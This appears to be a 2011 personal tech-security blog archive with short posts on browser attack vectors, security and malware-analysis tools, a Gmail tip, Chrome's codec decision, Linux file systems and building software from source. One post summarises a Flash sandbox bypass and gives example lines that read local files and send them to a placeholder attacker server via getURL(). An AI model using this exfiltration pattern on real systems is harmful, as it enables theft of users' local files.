Three web attack vectors seem to be responsible for the majority of computer attacks that involve a web browser:
Most attacks include one or two of the three techniques. For instance, Koobface worm targets the user (social engineering to click links) and the web application (hijacking social networking site sessions). An attack that combines all elements would be particularly effective (do you know of any examples?).
- The attack can incorporate an element of social engineering to persuade the victim to take an action that compromises security. For instance, the victim can supply data to a phishing site or install a program that will turn out to be malicious.
- The attacker can use the browser as a gateway for attacking web applications via techniques such as cross-site scripting (XSS), Cross-Site Request Forgery (CSRF) and Clickjacking.
- The attacker can exploit a vulnerability in the web browser or in local software that the browser can invoke. Such client-side exploits have targeted browser add-ons such as Flash, Adobe Reader and Java Runtime Environment (JRE).
The following series of posts explores these three web browser attack vectors in greater detail, discussing how enterprises can protect themselves against such attacks:
— Lenny Zeltser
- Mitigating Attacks on the User of the Web Browser
- Mitigating Attacks on Web Applications Through the Browser
- Mitigating Attacks on the Web Browser and Add-Ons
Wednesday, January 26, 2011
Monday, January 24, 2011
Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface. The tool takes snapshots of an organization's system and compares ("diffing") these to identify changes. The tool does not analyze a system based on signatures or known vulnerabilities; instead, it looks for classes of security weaknesses as applications are installed on the Windows operating system.
The tool also gives an overview of the changes to the system Microsoft considers important to the security of the platform and highlights these in the attack surface report. The Microsoft Security Development Lifecycle (SDL) requires development teams to define a given product's default and maximum attack surface during the design phase to reduce the likelihood of exploitation wherever possible. Additional information can be found in the Measuring Relative Attack Surface paper.
Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters that affect a computer's attack surface.
Download the free tool (x64 and x86) at http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e068c224-9d6d-4bf4-aab8-f7352a5e7d45&displaylang=en
Sunday, January 23, 2011
There are some good docs to get you up at their wiki site: Installation Guide, Getting Started, Console Quick Start, GUI Quick Start, Full Documentation. Follow them at Inguma Development.
Download it at http://code.google.com/p/inguma/
Saturday, January 22, 2011
Monday, January 17, 2011
We were pretty stoked when Google debuted its multiple account sign-in feature, and reader Sam has discovered a way to switch between accounts faster using a small URL tweak.
I was flipping between two Gmail account tabs using Google's multiple logins feature, and I noticed that the two URLs are almost identical:
https://mail.google.com/mail/u/1/#inbox. It turns out that switching between the 0 and 1 (and presumably higher numbers if there are more than 2 accounts logged in) switches accounts. In particular, since there is no keyboard shortcut for switching between accounts, editing the URL may be the fastest way to do so using only the keyboard.
In fact, the fastest way to switch between them using only the keyboard would be to bookmark the sites and create address bar keywords for them, so you can flip back and forth using just a few keystrokes instead of having to use your mouse. Thanks, Sam!
Saturday, January 15, 2011
Download the new version of REMnux from its main page as a virtual appliance and/or as a Live CD. Here're the quick highlight of the tools it supports.
Malicious Websites Analysis:
- Updated version of Jsunpack-n (proxy support, encrypted PDF handling)
- Includes Stunnel (for interception of SSL sessions)
- Includes RABCDAsm toolkit for RE malicious Flash (SWF) programs.
- Includes tor and torsocks (for anonymizing interactions with suspicious websites)
- Includes Burp Suite Free Edition.
- Updated Volatility memory forensics framework to version 1.4 RC 1 (support Vista and 7).
- Includes AESKeyFinder and RSAKeyFinder tools (for finding AES and RSA keys in a memory image).
- Includes pyOLEScanner.py (for analysis of malicious Microsoft Office documents).
- Includes libemu library to obtain the “sctest” tool (for shellcode analysis).
- Added the “whois” utility.
- Added xortools.py and pescanner.py tools (from Malware Analyst’s Cookbook).
- Installed VBinDiff for viewing and comparing files.
- Installed ircII to supplement the Irssi IRC client.
- Added the VirusTotal VTzilla Firefox extension.
- Added md5deep to assist with hash calculating-operations.
- Added ClamAV for manually scanning suspicious files and generating signatures.
Thursday, January 13, 2011
However, there is a longer list of unpatch Microsoft vulnerabilities at VUPEN Security. Any 0day there?
Goto "Blue Screen" in Designers Colors with in One Click.
Today, I found this, called LibreOffice. It is available for Linux (x86 and 64 bit), Mac OS X, and Windows. Most importantly, it supports docx format natively.
We expect even more rapid innovation in the web media platform in the coming year and are focusing our investments in those technologies that are developed and licensed based on open web principles. To that end, we are changing Chrome's HTML5 <video> support to make it consistent with the codecs already supported by the open Chromium project. Specifically, we are supporting the WebM (VP8) and Theora video codecs, and will consider adding support for other high-quality open codecs in the future. Though H.264 plays an important role in video, as our goal is to enable open innovation, support for the codec will be removed and our resources directed towards completely open codec technologies.
Google decided to pick sides, much like Mozilla and Opera, in an effort to encourage developers to use WebM. Right now, the only important website that uses WebM is YouTube, Google's video sharing service. Internet Explorer, Safari and iOS devices are unlikely to support WebM, while hardware acceleration and Flash support are expected later this year.
John Gruber thinks that 'this is just going to push publishers toward forcing Chrome users to use Flash for video playback — and that the video that gets sent to Flash Player will be encoded as H.264'. He also finds it ironic that Google Chrome bundles Adobe's proprietary Flash plugin, which is a great software for playing H.264 videos.
VP8 has a long way to go before becoming the codec of choice for Web videos and Google decided to make it more popular by dropping support for the competing codec from its browser. Last year, Andy Rubin said that sometimes being open 'means not being militant about the things consumer are actually enjoying,' but that's not the case here.
Thursday, January 06, 2011
- Flash is designed around the sandbox concept.
- Flash cannot read local files except for the cookie files.
- Bypass the restriction and make flash to access any local and remote files.
- Found a protocol handler that wasn't blacklisted by Adobe.
- User will not be prompted for permission when bypassing attempts.
- Using file:// and point to local system. Eg: file://\\192.168.1.1\stolen-data-here\
- Then pass the content back to attacker server via getURL(). Eg: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);
Monday, January 03, 2011
Here are some great points for me (from the article):
- Compare to ext2/ext3, ext4 is better for SSD and general performance.
- BtrFS makes great for servers due to it's features on performance, snapshot, transparent compression, and online defragmentation.
- ReiserFS is great for small files (log), database and email servers.
- XFS only works great for large file that requires constant throughput (media files).
- JFS works great for both small and large files, with very low CPU usage.
- ZFS, an advanced file system that shows great performance in large disk arrays, supports drive pooling, snapshots, and dynamic disk striping.
HTG Explains: Which Linux File System Should You Choose?
Image by DijutalTim
What is Journaling?
File System Options
- At this time you probably should not use Ext in any machine due to its limitation and age. It also is no longer supported in many distributions.
- Due to lower write requirements, and hence lower erases, it is ideal for flash memory especially on USB flash drives.
- Modern SSDs have a increased life span and additional features that can negate the need for using a non-journaling file systems.
- Use if you need to upgrade a previous Ext2 file system to have journaling.
- You will probably get the best database performance from Ext3 due to years of optimizations.
- Not the best choice for file servers because it lacks disk snapshots and file recovery is very difficult if deleted.
- A better choice for SSDs than Ext3 and improves on general performance over both previous Ext versions. If this is your distro’s default supported file system, you should probably stick with it for any desktop or laptop you set up.
- It also shows promising performance numbers for database servers, but hasn’t been around as long as Ext3.
- BtrFS makes a great server file system due to it’s performance, snapshots, and many other features.
- Oracle is also working on a replacement for NFS and CIFS called CRFS which boasts better performance and more features. Making it the best choice for a file server.
- The performance tests have shown it to lag behind Ext4 on flash memory such as SSDs, as a database server, and even certain cases of general system read/writes.
- Ubuntu 10.10 only allows you to install BtrFS if you use the text base alternate install CD and your /boot partition still requires an Ext file system.
- Has great performance for small files such as logs and is suited for databases and email servers.
- ReiserFS can be dynamically expanded but not shrunk and does not support FS level encryption.
- The future of Reiser4 is questionable and BtrFS is probably a better choice.
- Good for a media file server because of constant throughput for large files.
- Most distributions require separate /boot partition because XFS and GRUB can be unpredictable
- Performance with small files is not as good as other file systems making it a poor choice for databases, email, and other servers that have a lot of logs.
- Not as well supported as Ext for personal computers and doesn’t have significant performance improvements or features over Ext3/4.
- Good performance for both large and small files and because of its low CPU usage is probably best for low powered servers and computers
- It does not have built in tools for drive pooling so it may not be as expandable as something like BtrFS but a netbook with only 1 hard drive may be a good option
- It also has fast disk checking compared to Ext but there have been some reports of disk corruption after long term use.
- Shows great performance in large disk arrays.
- Supports a lot of advanced features including drive pooling, snapshots, and dynamic disk striping.
- It may be difficult to install in Linux because it requires FUSE and might not be supported by your distribution.
So Which One Should You Choose?
So now that you understand the differences between the file systems, which one would you choose?
Sunday, January 02, 2011
- Do you know why it starts with UUID?
- Do you know you can mount NTFS partition with ntfs-3g driver?
- How about the options? auto/noauto? exec/noexec? ro/rw? sync/async? user/nouser?
- Do you know that "user" option automatically implies "exec"?
- What are dumping and pass?
Preparing your system:
- sudo apt-get install build-essential checkinstall
- sudo apt-get install subversion git-core mercurial
- sudo mkdir /usr/local/src
- sudo chown $USER /usr/local/src
- sudo apt-get install apt-file
- sudo apt-file update
- cd /usr/local/src
- tar -zxvf
- [ or ] tar -jxvf
- cd /usr/local/src/
- [ optional ] sudo apt-get install autoconf
- [ optional ] apt-file search
- [ optional ] sudo apt-get install
- sudo checkinstall
- [ add description accordingly ]